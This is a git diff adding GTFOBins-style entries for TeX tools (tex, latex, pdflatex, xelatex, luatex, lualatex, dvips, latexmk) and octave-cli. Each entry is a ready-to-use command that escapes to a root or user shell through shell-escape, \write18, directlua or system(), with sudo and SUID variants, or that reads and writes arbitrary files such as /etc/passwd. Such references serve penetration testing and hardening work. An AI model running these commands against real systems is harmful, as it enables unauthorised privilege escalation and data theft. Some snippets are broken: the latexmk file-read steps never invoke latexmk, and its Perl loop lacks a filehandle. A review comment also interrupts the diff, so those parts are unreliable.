diff --git a/_gtfobins/dvips.md b/_gtfobins/dvips.md
new file mode 100644
index 0000000..0b21e74
--- /dev/null
+++ b/_gtfobins/dvips.md
@@ -0,0 +1,16 @@
+---
+description: The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.
+functions:
+ shell:
+ - code: |
+ tex '\special{psfile="`/bin/sh 1>&0"}\end'
+ dvips -R0 texput.dvi
+ sudo:
+ - code: |
+ tex '\special{psfile="`/bin/sh 1>&0"}\end'
+ sudo dvips -R0 texput.dvi
+ limited-suid:
+ - code: |
+ tex '\special{psfile="`/bin/sh 1>&0"}\end'
+ ./dvips -R0 texput.dvi
+---
diff --git a/_gtfobins/latex.md b/_gtfobins/latex.md
new file mode 100644
index 0000000..17919a0
--- /dev/null
+++ b/_gtfobins/latex.md
@@ -0,0 +1,21 @@
+---
+functions:
+ shell:
+ - code: |
+ latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
+ file-read:
+ - description: The read file will be part of the output.
+ code: |
+ latex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
+ strings article.dvi
+ sudo:
+ - description: The read file will be part of the output.
+ code: |
+ sudo latex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
+ strings article.dvi
+ - code: |
+ sudo latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
+ limited-suid:
+ - code: |
+ ./latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
+---
diff --git a/_gtfobins/latexmk.tex b/_gtfobins/latexmk.tex
new file mode 100644
index 0000000..bb43d63
--- /dev/null
+++ b/_gtfobins/latexmk.tex
@@ -0,0 +1,14 @@
+description: This allows to execute [`perl`](/gtfobins/perl/) code.
+functions:
+ shell:
+ - code: latexmk -e 'exec "/bin/sh";'
+ - code: latexmk -latex='/bin/sh #' /dev/null
+ file-read:
+ - code: latexmk -e 'open(X,"/etc/passwd");while(){print $_;}exit'
+ - description: The read file will be part of the output.
+ code: |
+ TF=$(mktemp)
+ echo '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' >$TF
+ strings tmp.dvi
+ sudo:
+ - code: sudo latexmk -e 'exec "/bin/sh";'
diff --git a/_gtfobins/lualatex.md b/_gtfobins/lualatex.md
new file mode 100644
index 0000000..9a85d99
--- /dev/null
+++ b/_gtfobins/lualatex.md
@@ -0,0 +1,10 @@
+---
+description: This allows to execute [`lua`](/gtfobins/lua/) code.
+functions:
+ shell:
+ - code: lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}'
+ sudo:
+ - code: sudo lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}'
+ limited-suid:
+ - code: ./lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}'
+---
diff --git a/_gtfobins/luatex.md b/_gtfobins/luatex.md
new file mode 100644
index 0000000..1014648
--- /dev/null
+++ b/_gtfobins/luatex.md
@@ -0,0 +1,10 @@
+---
+description: This allows to execute [`lua`](/gtfobins/lua/) code.
+functions:
+ shell:
+ - code: luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
+ sudo:
+ - code: sudo luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
+ limited-suid:
+ - code: ./luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
+---
diff --git a/_gtfobins/octave.md b/_gtfobins/octave.md
new file mode 100644
index 0000000..df881f7
--- /dev/null
+++ b/_gtfobins/octave.md
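Review bot: `_gtfobins/latexmk.tex` is out of step with every other entry in this commit: the others are `_gtfobins/<tool>.md` and wrap their YAML in `---` delimiters, while this file has a `.tex` extension and its 14 hunk lines are bare YAML with no opening or closing `---`, so it is unlikely to be parsed as front matter the way its siblings are. Renaming it to `latexmk.md` and adding `---` as the first and last line would bring it in line with the other files. The description wording `This allows to execute`, also used in lualatex.md and luatex.md, reads better as `This allows executing`.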
@@ -0,0 +1,14 @@
+---
+description: The payloads are compatible with GUI.
+functions:
+ shell:
+ - code: octave-cli --eval 'system("/bin/sh")'
+ file-write:
+ - code: octave-cli --eval 'filename = "file_to_write"; fid = fopen(filename, "w"); fputs(fid, "DATA"); fclose(fid);'
+ file-read:
+ - code: octave-cli --eval 'format none; fid = fopen("file_to_read"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'
+ sudo:
+ - code: sudo octave-cli --eval 'system("/bin/sh")'
+ limited-suid:
+ - code: ./octave-cli --eval 'system("/bin/sh")'
+---
diff --git a/_gtfobins/pdflatex.md b/_gtfobins/pdflatex.md
new file mode 100644
index 0000000..2c8530b
--- /dev/null
+++ b/_gtfobins/pdflatex.md
@@ -0,0 +1,21 @@
+---
+functions:
+ shell:
+ - code: |
+ pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
+ file-read:
+ - description: The read file will be part of the output.
+ code: |
+ pdflatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
+ pdftotext article.pdf -
+ sudo:
+ - description: The read file will be part of the output.
+ code: |
+ sudo pdflatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
+ pdftotext article.pdf -
+ - code: |
+ sudo pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
+ limited-suid:
+ - code: |
+ ./pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
+---
diff --git a/_gtfobins/pdftex.md b/_gtfobins/pdftex.md
new file mode 100644
index 0000000..56199a4
--- /dev/null
+++ b/_gtfobins/pdftex.md
@@ -0,0 +1,12 @@
+---
+functions:
+ shell:
+ - code: |
+ pdftex --shell-escape '\write18{/bin/sh}\end'
+ sudo:
+ - code: |
+ sudo pdftex --shell-escape '\write18{/bin/sh}\end'
+ limited-suid:
+ - code: |
+ ./pdftex --shell-escape '\write18{/bin/sh}\end'
+---
diff --git a/_gtfobins/tex.md b/_gtfobins/tex.md
new file mode 100644
index 0000000..9b2830d
--- /dev/null
+++ b/_gtfobins/tex.md
@@ -0,0 +1,12 @@
+---
+functions:
+ shell:
+ - code: |
+ tex --shell-escape '\write18{/bin/sh}\end'
+ sudo:
+ - code: |
+ sudo tex --shell-escape '\write18{/bin/sh}\end'
+ limited-suid:
+ - code: |
+ ./tex --shell-escape '\write18{/bin/sh}\end'
+---
diff --git a/_gtfobins/xelatex.md b/_gtfobins/xelatex.md
new file mode 100644
index 0000000..7b0713a
--- /dev/null
+++ b/_gtfobins/xelatex.md
@@ -0,0 +1,21 @@
+---
+functions:
+ shell:
+ - code: |
+ xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
+ file-read:
+ - description: The read file will be part of the output.
+ code: |
+ xelatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
+ strings article.dvi
+ sudo:
+ - description: The read file will be part of the output.
+ code: |
+ sudo xelatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
+ strings article.dvi
+ - code: |
+ sudo xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
+ limited-suid:
+ - code: |
+ ./xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
+---
diff --git a/_gtfobins/xetex.md b/_gtfobins/xetex.md
new file mode 100644
index 0000000..cfe7926
--- /dev/null
+++ b/_gtfobins/xetex.md
@@ -0,0 +1,12 @@
+---
+functions:
+ shell:
+ - code: |
+ xetex --shell-escape '\write18{/bin/sh}\end'
+ sudo:
+ - code: |
+ sudo xetex --shell-escape '\write18{/bin/sh}\end'
+ limited-suid:
+ - code: |
+ ./xetex --shell-escape '\write18{/bin/sh}\end'
+---